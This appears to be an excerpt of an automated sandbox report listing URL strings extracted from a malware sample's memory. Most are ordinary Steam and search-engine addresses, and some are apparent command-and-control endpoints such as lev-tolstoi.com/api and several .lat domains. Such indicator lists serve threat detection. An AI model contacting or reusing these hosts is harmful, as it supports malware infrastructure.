Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowvc
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crosshuaht.lat
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grannyejh.lat:443/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.stfc3
Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1530034448.00000000009FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/C
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/Uf
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apickc6
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/apivZ
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/q6_e
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/api
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apil
Source: 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/apin.txtPK
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steamp&c
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacebudi.lat:443/apigl
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://rapeflowwj.lat:443/api
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
